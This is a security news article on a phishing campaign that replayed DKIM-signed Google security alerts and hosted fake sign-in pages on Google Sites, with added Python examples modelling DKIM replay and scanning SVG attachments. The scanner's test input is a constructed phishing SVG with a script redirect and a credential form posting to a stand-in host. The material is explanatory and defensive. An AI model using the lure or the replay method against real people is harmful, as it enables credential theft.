Cybersecurity experts are raising alarms over a highly advanced phishing campaign that leverages Google’s infrastructure to send seemingly legitimate emails that redirect users to malicious websites. The attackers have used a clever technique that not only evades standard Gmail security filters but also exploits the trust users place in Google-branded domains and services.
The campaign came to light when Nick Johnson, lead developer of the Ethereum Name Service (ENS), shared his experience on X. Johnson revealed that the phishing email he received was actually sent from “[email protected],” a genuine Google email address. More disturbingly, it passed DomainKeys Identified Mail (DKIM) authentication, the check mail providers use to confirm that a message's signed headers and body have not been altered since the sending domain signed them. As a result, Gmail accepted the email without issuing any warnings and placed it in the same thread as legitimate Google security alerts.
The email claimed to inform recipients about a subpoena issued by law enforcement concerning unspecified content stored in their Google account. It then instructed users to visit a link hosted on Google’s own site — sites.google[.]com — to view or contest the supposed subpoena. Clicking the link led users to a phishing page that convincingly mimicked the official Google Support portal. Victims were given two options: “upload additional documents” or “view the case.” Regardless of the choice, both buttons led to a fraudulent Google sign-in page hosted on Google Sites — a tool that, ironically, is intended to simplify webpage creation for non-technical users.
Why Google Sites Makes the Fake Login Page Easy
Johnson explained that Google Sites, being a legacy product, still allows arbitrary scripts and embeds, including custom JavaScript. That flexibility lets an attacker build a credential-harvesting page that is hard to tell apart from the real sign-in page and that is served from a sites.google[.]com address, so checking the domain alone offers the victim no protection. The attackers also appear to replace their pages quickly whenever one is flagged and taken down by Google's abuse team. Because the Google Sites interface lacks a built-in option to report abuse, takedowns are slower and the operators have more room to work.
DKIM Replay and Infrastructure Misuse
What makes this attack particularly notable is its use of a DKIM replay technique. The attackers first register a Google account with an address of the form “me@<domain>.com.” They then create a Google OAuth application and give it a name that contains the full text of the phishing lure. When they grant that app access to the account, Google itself sends a “Security Alert” email to the associated “me@” address warning about the new app access, and the alert quotes the app name, lure text included.
Because that alert is generated and signed by Google, it carries a valid DKIM signature for a Google domain. The attackers then forward the signed message from an Outlook account, routing it through a custom Simple Mail Transfer Protocol (SMTP) server called Jellyfish; the message is received by Namecheap's PrivateEmail infrastructure and from there forwarded into the victim's Gmail inbox. The replay works because a DKIM signature covers only the signed header fields and the body. Each relay hop adds Received: headers and changes the envelope sender, but leaves the signed headers and body untouched, so the signature stays valid all the way to the target.
The result is a message that passes SPF, DKIM, and DMARC and is, to the recipient's mail client, indistinguishable from an actual Google email. DMARC needs only one aligned mechanism to pass, and here the DKIM signing domain aligns with the Google domain in the From: header. Johnson noted an additional tactic: because the attacker's account was named “me@,” the alert's To: field reads me@<domain>, which Gmail shortens to “me,” exactly the label it uses for the reader's own address. This hides the fact that the message was originally addressed to someone else and increases the likelihood that the target trusts and engages with it.
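To make the DKIM replay concrete, here is an added example (my own, not Johnson's write-up or Google's code) that models what a DKIM signature does and does not cover. It uses HMAC-SHA256 with a shared demo key in place of DKIM's RSA signature and DNS key lookup, an assumption made so the example runs offline; the sample alert, the me@attacker-owned.example account, and the relay hostnames are all constructed. It shows a signed alert still verifying after two relay hops that prepend Received: and Return-Path: headers, the DKIM d= domain aligning with the From: domain (the condition DMARC needs), and verification failing as soon as a single phrase of the body changes.

```python
"""Minimal model of why a DKIM-signed message survives forwarding (DKIM replay).

Added example, not code from the article or from Google. Assumptions: HMAC-SHA256
with a shared demo key stands in for the RSA signature and DNS-published public
key of real DKIM; canonicalization follows the RFC 6376 "relaxed" rules; the
sample message and every domain in it are constructed.
"""
import email
import hashlib
import hmac
import re

SIGNED_HEADERS = ["from", "to", "subject", "date"]
DEMO_KEY = b"stand-in-for-the-signer-private-key"  # assumption: HMAC, not RSA


def relaxed_header(name, value):
    """Relaxed header canonicalization: lowercase name, unfold, collapse whitespace."""
    value = re.sub(r"\s+", " ", value.replace("\r\n", "")).strip()
    return f"{name.lower()}:{value}\r\n"


def relaxed_body(body):
    """Relaxed body canonicalization: trim/collapse WSP, CRLF endings, no trailing blank lines."""
    lines = [re.sub(r"[ \t]+", " ", line.rstrip(" \t")) for line in body.split("\n")]
    text = "\r\n".join(lines).rstrip("\r\n")
    return text + "\r\n" if text else ""


def parse_tags(value):
    """Split a DKIM-Signature value ('k=v; k=v') into a dict."""
    tags = {}
    for item in value.split(";"):
        if "=" in item:
            k, v = item.split("=", 1)
            tags[k.strip()] = v.strip()
    return tags


def hash_inputs(raw, signed_headers):
    """Return (canonicalized signed headers, body hash) for a raw RFC 5322 message."""
    msg = email.message_from_string(raw)
    body_hash = hashlib.sha256(relaxed_body(msg.get_payload()).encode()).hexdigest()
    headers = "".join(relaxed_header(h, msg[h]) for h in signed_headers if msg[h] is not None)
    return headers, body_hash


def sign(raw, domain="google.com"):
    """Prepend a DKIM-Signature header binding the listed headers and the body."""
    headers, body_hash = hash_inputs(raw, SIGNED_HEADERS)
    tag = f"v=1; a=hmac-sha256; d={domain}; s=demo; h={':'.join(SIGNED_HEADERS)}; bh={body_hash}; b="
    # The signature input includes the DKIM-Signature header itself with b= left empty.
    data = headers + relaxed_header("dkim-signature", tag)
    return f"DKIM-Signature: {tag}{hmac.new(DEMO_KEY, data.encode(), hashlib.sha256).hexdigest()}\n{raw}"


def verify(raw):
    """True if the body hash and the signature over the signed headers both check out."""
    msg = email.message_from_string(raw)
    sig_value = msg["DKIM-Signature"]
    if sig_value is None:
        return False
    tags = parse_tags(sig_value)
    headers, body_hash = hash_inputs(raw, tags["h"].split(":"))
    if body_hash != tags["bh"]:
        return False
    unsigned = sig_value[: sig_value.rfind("b=") + 2]  # same header with b= emptied
    data = headers + relaxed_header("dkim-signature", unsigned)
    expected = hmac.new(DEMO_KEY, data.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tags["b"])


def dkim_aligned_with_from(raw):
    """The DMARC question: does the signing domain (d=) match the From: domain?"""
    msg = email.message_from_string(raw)
    tags = parse_tags(msg["DKIM-Signature"] or "")
    from_domain = msg["From"].rsplit("@", 1)[-1].strip(" >").lower()  # 'Name <user@dom>' -> 'dom'
    return tags.get("d", "").lower() == from_domain


# Constructed stand-in for the alert Google sends when an OAuth app is authorized;
# the lure text is the app name, which the alert quotes back to the account owner.
ALERT = """From: Google <no-reply@google.com>
To: me@attacker-owned.example
Subject: Security alert
Date: Mon, 14 Apr 2025 10:00:00 +0000

"Google Legal Support: subpoena notice, review the case" was granted access to your Google Account.
"""


def relay(signed):
    """A forwarding hop: new Received:/Return-Path:, signed headers and body untouched."""
    return "Received: from jellyfish.example by mx.privateemail.example\nReturn-Path: <bounce@attacker-owned.example>\n" + signed


def tamper(signed):
    """Change one phrase of the body; the bh= tag no longer matches."""
    return signed.replace("review the case", "pay the fee")


def demo():
    signed = sign(ALERT)
    return {
        "original": verify(signed),
        "relayed_twice": verify(relay(relay(signed))),
        "relayed_and_aligned": dkim_aligned_with_from(relay(signed)),
        "tampered": verify(tamper(signed)),
    }
```

Running demo() gives original and relayed_twice True, relayed_and_aligned True, and tampered False. The practical lesson is that a passing DKIM or DMARC result only says the signed content originated with the signer, not that the signer sent it to you: the replayed alert was addressed to me@ at the attacker's domain, and the signed To: header still says so. Detection logic for replay therefore has to look at the delivery path (the last-hop Received: line and the envelope recipient) and compare the signed To: header against the mailbox that actually received the message, rather than trusting the signature alone.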
When contacted for comment, Google said that the abuse vector had been shut down and that new protections were rolled out to prevent similar incidents. A spokesperson emphasized that Google never requests login credentials, passwords, or one-time codes via email or phone. Users are strongly encouraged to activate two-factor authentication (2FA) or adopt passkeys for enhanced security.
A Surge in Advanced Phishing Techniques
This incident is just the latest in a growing wave of sophisticated phishing attacks that combine technical manipulation with social engineering. Just nine months ago, researchers at Guardio Labs revealed a vulnerability in Proofpoint’s email systems that allowed millions of spoofed emails impersonating major brands like IBM, Best Buy, Nike, and Disney to bypass security filters.
There has also been a recent rise in phishing campaigns that use Scalable Vector Graphics (SVG) attachments. According to Russian cybersecurity firm Kaspersky, over 4,100 phishing emails containing SVG files have been detected since the beginning of 2025. Because SVG is XML, a file can carry HTML and JavaScript alongside its drawing instructions, so what looks like an image attachment can, when opened, redirect the viewer to a fake Microsoft login page or a bogus Google Voice portal.
Kaspersky analysts warn that phishers are constantly evolving. “They vary their tactics, sometimes using redirection and obfuscation, and other times experimenting with different file formats,” the firm said. “The SVG format offers attackers a powerful tool to embed malicious content within what appears to be an image.”
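As an added example of the SVG technique described above (my own triage code, not Kaspersky's tooling), the following parses an SVG attachment statically and flags the constructs a phishing lure relies on: script elements, event-handler attributes, javascript: links, and HTML forms embedded through foreignObject. Both sample files are constructed, and the hostnames in them are made up; the only assumption is that xml.etree suffices because nothing needs to be rendered to decide the file is not a plain picture.

```python
"""Static triage of an SVG attachment for the phishing tricks described above.

Added example, not Kaspersky's tooling. Assumption: xml.etree is enough, since the
goal is to flag script, event handlers, HTML embedded via foreignObject and risky
URL schemes before the file is ever opened in a browser. The sample SVGs are
constructed and every hostname in them is made up.
"""
import xml.etree.ElementTree as ET

XHTML_NS = "{http://www.w3.org/1999/xhtml}"
HTML_FORM_TAGS = {"form", "input", "iframe", "object", "embed", "meta"}
RISKY_SCHEMES = ("javascript:", "data:text/html", "vbscript:")


def local_name(qualified):
    """'{ns}tag' -> 'tag', case-folded; plain names pass through."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes):
    """Return a sorted list of reasons this SVG should not be treated as a plain image."""
    findings = set()
    root = ET.fromstring(data)  # parse only; nothing here executes script or fetches URLs
    for el in root.iter():
        name = local_name(el.tag)
        if name == "script":
            findings.add("script element")
        if name == "foreignobject":
            findings.add("foreignObject (arbitrary HTML embedding)")
        if el.tag.startswith(XHTML_NS) and name in HTML_FORM_TAGS:
            findings.add(f"embedded HTML <{name}>")
        for attr, value in el.attrib.items():
            a = local_name(attr)
            v = value.strip().lower()
            if a.startswith("on"):  # onload, onclick, onmouseover, ...
                findings.add(f"event handler {a}")
            if a == "href" and v.startswith(RISKY_SCHEMES):
                findings.add(f"href with {v.split(':', 1)[0]}: scheme")
            if a == "action":  # a form posting credentials somewhere
                findings.add("form action target")
    return sorted(findings)


# Constructed lure: looks like a voicemail notice, redirects to a fake login page
PHISH_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="400" height="300"
     onload="setTimeout(go, 500)">
  <rect width="400" height="300" fill="white"/>
  <text x="20" y="40">Google Voice: 1 new voicemail</text>
  <a href="javascript:go()"><text x="20" y="80">Play</text></a>
  <script type="text/javascript"><![CDATA[
    function go() { window.location = "https://accounts.login.example.invalid/"; }
  ]]></script>
  <foreignObject width="400" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://collect.example.invalid/p">
      <input name="email"/><input name="password" type="password"/>
    </form>
  </foreignObject>
</svg>"""

# Constructed benign logo-style SVG for comparison
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="30" fill="#4285f4"/>
  <text x="16" y="40" fill="white">OK</text>
</svg>"""
```

svg_findings(PHISH_SVG) reports the script element, the onload handler, the javascript: link, the foreignObject, the embedded form and inputs, and the form action, while svg_findings(BENIGN_SVG) returns an empty list. One caveat worth keeping in mind when tuning such a check: script inside an SVG does not run when the file is displayed through an <img> tag, but it does run when the recipient opens the attachment directly in a browser, which is exactly what a mail client does for a downloaded "image".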